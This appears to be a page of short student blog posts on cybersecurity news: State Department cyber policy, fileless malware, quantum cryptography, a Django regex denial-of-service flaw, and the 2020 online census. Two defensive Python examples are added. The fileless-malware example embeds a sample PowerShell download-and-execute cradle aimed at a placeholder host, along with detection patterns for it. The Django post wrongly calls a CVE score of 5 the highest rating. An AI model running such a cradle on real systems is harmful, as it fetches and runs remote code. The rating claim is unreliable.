Pompeo Discusses Cyber Security at the State Department

Former Secretary of State Rex Tillerson eliminated the cyber security position at the State Department about one month ago. Tillerson eliminated this position in hopes of forming “a bureau focused on economic and business affairs.” This act disappointed many members of the US government, and eventually resulted in President Trump replacing Tillerson with the current CIA director Mike Pompeo. John Sullivan will serve as Secretary of State until the US Senate confirms Pompeo’s approval.

Shortly after President Trump fired Tillerson, the CIA began to put more resources into cyber security. Last Thursday, CIA Director Mike Pompeo said, “I can only say that, every element of government has a piece of its cyber duty. It’s one of the challenges that is so deeply divided, that we don’t have a central place to do cyber work.” Many believe the removal of the cyber security position at the State Department foreshadows the US not engaging in foreign affairs with cyber security. Fortunately, numerous state officials have insisted that cyber security remains a top priority at the State Department. Pompeo has not given any information on his decision about the cyber security position.

-Spencer Fleming

Source: http://thehill.com/policy/cybersecurity/382882-pompeo-pressed-on-plans-for-cyber-at-state


The Rise of Fileless malware

Over the last two years, there has been an uptick in the number of malware attacks that are fileless. This means that the malware is designed to not rely on or interact with the filesystem of the host machine. This is so it is relatively undetectable by file scanning, which is the common way to find malware. This rising trend will change how we deal with these kinds of malware threats. One of the changes to combat this threat is to turn to behavior-based detection strategies like “script block logging,” which will keep track of code that is executed, for someone to sift through and look for abnormalities.

Experts are predicting that fileless malware attacks will continue to rise as they did from 2016 to 2017 because of their success rate. Fileless attacks are more likely to be successful than file-based attacks by an order of magnitude (literally 10 times more likely), according to the 2017 “State of Endpoint Security Risk” report from Ponemon. The ratio of fileless to file-based attacks grew in 2017 and is forecasted to continue to grow this year. This goes to show that we need to constantly be adapting to different threats, because we know the hackers will.
– Ryne Krueger
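
As an added illustration of sifting script block logs (not code from the post above), this Python sketch reassembles script blocks that PowerShell splits across several Event ID 4104 records and tags the ones that match a few indicators. The sample records and the indicator list are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed records using PowerShell Event ID 4104 field names.
# An empty Path means the block did not come from a script file on disk.
EVENTS = [
    {"ScriptBlockId": "a1", "MessageNumber": 2, "MessageTotal": 2, "Path": "",
     "ScriptBlockText": "ring('http://example.invalid/stage')"},
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 2, "Path": "",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadSt"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "Path": "C:\\Scripts\\backup.ps1", "ScriptBlockText": "Get-ChildItem D:\\data"},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 2, "Path": "",
     "ScriptBlockText": "[Reflection.Assembly]::Load($bytes)"},
]

# Hypothetical starter indicators; tune them against your own baseline.
INDICATORS = {
    "download-cradle": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest", re.I),
    "dynamic-eval": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "in-memory-load": re.compile(r"Reflection\.Assembly\]::Load|FromBase64String", re.I),
}

def reassemble(events):
    """Join the fragments of each script block in MessageNumber order."""
    frags, meta = defaultdict(dict), {}
    for e in events:
        frags[e["ScriptBlockId"]][e["MessageNumber"]] = e["ScriptBlockText"]
        meta[e["ScriptBlockId"]] = (e["MessageTotal"], e["Path"])
    return {
        sid: {"text": "".join(p[n] for n in sorted(p)),
              "complete": len(p) == meta[sid][0],
              "path": meta[sid][1]}
        for sid, p in frags.items()
    }

def triage(events):
    """Return {ScriptBlockId: sorted tags} for blocks matching an indicator."""
    findings = {}
    for sid, block in reassemble(events).items():
        tags = [name for name, rx in INDICATORS.items() if rx.search(block["text"])]
        if not tags:
            continue
        if not block["path"]:
            tags.append("no-file-path")
        if not block["complete"]:
            tags.append("incomplete")
        findings[sid] = sorted(tags)
    return findings
```

Matching on single records would miss block `a1`, because the method name is split across its two fragments.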




Quantum Computing’s Impact on Cyber Security

With more and more technological advancements every day, our vision of quantum computing is turning more into a reality than a theory. Companies like IBM and Microsoft are accelerating forward and coming closer than ever to building the first fully functioning quantum computer. Seemingly on the edge of an almost quantum revolution, it’s important to ask questions about how integral parts of our lives like cyber security will be affected by this change.

First, let’s understand what quantum computing is. Comparing it to modern computing, which relies on discrete values of a bit being either a 0 or a 1, quantum computing would allow both of these possibilities to exist simultaneously in something called qubits, and these values only truly form when they are observed. This allows quantum computers to handle operations and equations at speeds that are exponentially higher than what we are used to in modern computers and their energy costs are far less.

How does this affect today’s security? Many of today’s security systems rely on cryptography; this is because normal computers struggle at factoring large numbers. This means that cryptography based on factoring numbers would be a safe bet against our technology today, but with the introduction of quantum computing, these practices would be useless. This isn’t the end of cryptography though because there are some approaches in use today that will be safe against the power of a quantum computer. That doesn’t mean that important companies and governments are using them though, and if quantum computing is to take off faster than anticipated they could run into some trouble. Other security strategies that are used today, like two-factor authentication, will still be just as effective after the introduction of quantum computing, due to multiple steps being taken by the person to log into a system.

Tomorrow’s security will be something almost unfathomable with quantum-based security implementations. Techniques like theoretically unbreakable cryptography, encrypting data to stop working if anyone attempts to uncover them and guaranteeing a safe passage to send data no matter what attacks are being used against it can all be potentially achieved with quantum computing. It’s not all positive though because with the power to develop secure techniques comes the power to exploit older strategies. An almost quantum arms race has begun between intelligence agencies and this is because the first agency to gain access to quantum computing power will have an incredible edge over all other countries.

Although quantum computers may never be a household item, their impact in the world will definitely be historical. While many of their advancements will benefit society and the internet infrastructure as we know it, it is still important to make sure that the world is ready for a step this large.

-Jeremy McGrath





Sanitize your strings, kiddos

Trusting user inputted strings has always been a problem in computing. Users will always find a way to break your application with some kind of weird character. Programmers have found clever ways to get around this, such as preparing SQL statements, escaping unknown characters, or just returning an error when coming across unknown text. However, with the rise of the internet and the availability of tools, hackers have gotten smarter at the way they attack inputs.

In the last month or so, Django found this out in their django.utils.text.Truncator class. This class had two methods, chars() and words(), which would attempt to clean input.

Well, for some reason, users wanted a way to clean HTML with these methods, so Django added an html keyword argument to the methods, which would attempt to clean the text as if it were HTML. However, due to a catastrophic backtracking vulnerability in a regular expression in those functions, malicious users could input complicated HTML that would take a long time to process. This would result in a DoS attack on the web server, and bring down services to other users. Uh-oh.

So, looking at the CVE, you can see the security community ranked it a 5, the highest rating. Needless to say, Django quickly patched the issue and launched a hot fix.

The moral of the story is that security vulnerabilities can happen to anyone, and you should know what the framework you are using is doing, instead of just blatantly trusting that it will work. Be aware of security in your everyday life.

— Kyle Kaniecki
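
To make catastrophic backtracking concrete, here is an added Python example (not Django's code, and not part of the post above). It puts a constructed pattern with a nested quantifier beside an unambiguous rewrite that accepts the same strings, plus an input length cap; the patterns, the `MAX_INPUT` value and the function names are assumptions made for the illustration.

```python
import re
import time

MAX_INPUT = 10_000  # hypothetical cap; set it to what the application really needs

# Constructed pattern with a nested quantifier; it is NOT Django's expression.
AMBIGUOUS = re.compile(r"^(\w+\s?)+$")
# Same accepted strings, but \w and \s never compete for the same character.
UNAMBIGUOUS = re.compile(r"^\w+(\s\w+)*\s?$")

def is_word_list(text, pattern=UNAMBIGUOUS):
    """Validate text, refusing oversized input before the regex engine sees it."""
    if len(text) > MAX_INPUT:
        raise ValueError("input too long")
    return pattern.match(text) is not None

def failure_time(pattern, n):
    """Seconds spent rejecting n word characters followed by one '!'."""
    probe = "a" * n + "!"
    start = time.perf_counter()
    pattern.match(probe)
    return time.perf_counter() - start

def growth(pattern, sizes=(14, 16, 18, 20)):
    """Timing per probe size; time doubling with each extra character is the warning sign."""
    return [(n, failure_time(pattern, n)) for n in sizes]

if __name__ == "__main__":
    for name, rx in (("ambiguous", AMBIGUOUS), ("unambiguous", UNAMBIGUOUS)):
        for n, secs in growth(rx):
            print(f"{name:12s} n={n:2d} {secs * 1000:9.3f} ms")
```

Running `growth()` on your own patterns in a unit test is a cheap way to catch this class of bug before it ships.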

2020 Online Census

In two years the United States will be conducting the census like they do every 10 years. This time though will be different. The United States will be doing a primarily online census. This could be a giant security risk.

Back in 2016, Australia decided to try an online census. As soon as the survey was posted, hackers performed a giant denial-of-service attack that caused the system to go down for 2 days. Though no information was breached, it still was an embarrassment for the country and proved that they weren’t ready.

The United States has been toying around with the idea of doing an online census since 2000 but it wasn’t used in 2010 due to a lack of trust in data collection effectiveness and security. It seems that the lack of trust hasn’t gone away but the pressure to move digital has caused this change.

Problems are already popping up in this census. The bureau is rushing it out which has prevented thorough testing of the security. In the tests that were conducted the data had issues being transmitted and received.

Not receiving the data could be the least of our worries though. Hackers could flood the census with phony data or breach data and release it. Both of these outcomes won’t look good on our government and will further a distrust people already have since the election. Maybe it is best to wait another 10 years until our platform is more secure and trustworthy.

—- Bailey Pearson